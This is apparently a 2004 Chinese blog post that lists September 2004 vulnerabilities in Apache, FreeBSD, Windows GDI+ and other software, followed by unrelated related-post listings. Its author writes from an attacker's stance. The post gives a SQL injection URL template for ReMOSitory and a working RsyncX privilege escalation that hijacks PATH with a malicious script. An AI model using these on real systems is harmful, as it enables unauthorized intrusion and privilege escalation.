9月安全漏洞

原创 2004年09月21日 19:26:00

◆ Apache Web Server远程IPv6缓冲区溢出漏洞

截止,我发表这个章子之前,凹是没拿到利用程序,找了几个要IPV6模拟数据包构造的程序,没人搞这块,这几天收集一下,兰州大学o3那一组01年开始搞IPV6,并且有个实验网,问问他内部消息,GO ,GO ,GO
 
◆ Apache Mod_DAV LOCK远程拒绝服务漏洞

点进去就知道,咋利用了,也GO,GO,GO
 
◆ ReMOSitory Server远程SQL注入漏洞

http://[target]/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*   国内用的还是少,不过有Mambo Open Source的,用以上URL构造,就可以达成注入攻击


 
◆ Google工具栏'About'跨站脚本执行漏洞

跨站,是实在搞不定,再搞,有写WEB利用脚本那会工夫,木马都杀进去几个了,看看也好,举一反三
 
◆ RsyncX本地权限提升漏洞

建立如下内容的~/bin/defaults文件:

=============================
#!/bin/sh                                                                      
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================

然后在用户路径的~/bin中运行RsyncX :

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

 
◆ FreeBSD本地内核缓冲区溢出漏洞

这东西有用,搜索了http://www.securityfocus.com/   没找到攻击程序

◆ Microsoft Windows GDI+ JPG解析组件缓冲区溢出漏洞

yahoo.com,N写日子前就是被这块漏洞所破坏,构造木马程序写入JPG文件,怪他自己吧,发布了这么长时间,
YAHOO的安全顾问也没补,http://www.cert.org.cn/articles/vulnerability/common/2004091521909.shtml
这是国家安全应急中心发布的漏洞,描述和资料

◆ Apache mod_ssl反向代理SSL远程缓冲区溢出漏洞
最近的apache漏洞都很多,很多EXP都没有响应的效果,不能得到ROOT

学习笔记 2017年9月13日

页面在不同屏幕大小的设备时可以用: @media(max-width:500px){ body{ background:red; } }中间部分写上需要...
  • linggty
  • linggty
  • 2017年09月14日 09:59
  • 255

2017年9月8日学习笔记

echo语句可以用来打印字符串,多行字符串,转义字符,变量,数组。注意echo不是函数 print语句可以用来打印字符串,多行字符串,转义字符,变量,数组等。print是函数,成功返回true失败返...
  • xioaf12
  • xioaf12
  • 2017年09月08日 10:52
  • 607

1752年9月奇怪的日历

当你在Linux的终端输入以下指令,你会发现一个很奇怪的现象 # cal -m 09 1752 September 1752 ...
  • sysuwzl
  • sysuwzl
  • 2011年08月22日 10:31
  • 1250

Android WebView 安全漏洞解决方案

Android WebView 安全漏洞最近发现公司的应用的WebView存在安全漏洞,找到了一些解决方案和大家一起分享一下,有什么理解不对的地方请多多指教。平时比较懒惰,有写博客的想法,但是懒动手,...
  • zhangqiluGrubby
  • zhangqiluGrubby
  • 2016年10月11日 16:52
  • 412

Web安全漏洞分类

1.1 Web安全漏洞分类 Web安全漏洞可以分为两类:一类包括平台的安全漏洞,另一类是应用自身的安全漏洞。 1.1.1    Web平台的安全漏洞 Web平台自身的安全漏洞——许多Web应用程...
  • pengben86
  • pengben86
  • 2012年10月15日 13:54
  • 1668

2017年9月英语总结

这个月的英语学习很棒,开始时每天早上读赖世雄音标,每天三到四个,有时候读几天就休息一下,坚持的不是很好,后来突击小队的成立,得到了很大的提升,在Bill的带领下每天的学习都很有激情,为期一周的赖世雄音...
  • lrtcsdn
  • lrtcsdn
  • 2017年09月30日 21:52
  • 362

java相关安全漏洞及整改建议

1. 防止用户直接访问url的权限控制    通过判断父类URL是否存在,判断是通过系统跳转的链接还是通过浏览器直接输入的跳转链接 参考如下 UsersFilter public v...
  • haishangyouling
  • haishangyouling
  • 2017年05月23日 16:54
  • 222

PHP获取时间日期

echo "今天:".date("Y-m-d")."";      echo "昨天:".date("Y-m-d",strtotime("-1 day")), "";      echo "明天:...
  • debugingstudy
  • debugingstudy
  • 2013年08月23日 03:19
  • 420

Tomcat 全系安全漏洞,请尽快修复

知友在官方了解到,Apache Tomcat团队今天发布公告称,Tomcat 6.x、7.x、8.x三个分支均发现安全漏洞,其中两个为重要的漏洞,建议用户尽快修复。 1.  Do...
  • superli0427
  • superli0427
  • 2014年02月27日 11:51
  • 426

圣经中真的藏有密码吗? 摘自台湾权威杂志《科学月刊》

 圣经中真的藏有密码吗?上  对于难以测知的未来,如果有人或有些事物能揭露其奥秘,一定会引起社会上的轰动。而中国预言中最家喻户晓、脍炙人口的,要属一千三百多年前,唐贞观年间袁天罡及李淳风合著的《推背图...
  • chutium
  • chutium
  • 2002年05月10日 19:35
  • 1507
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:9月安全漏洞
举报原因:
原因补充:

(最多只允许输入30个字)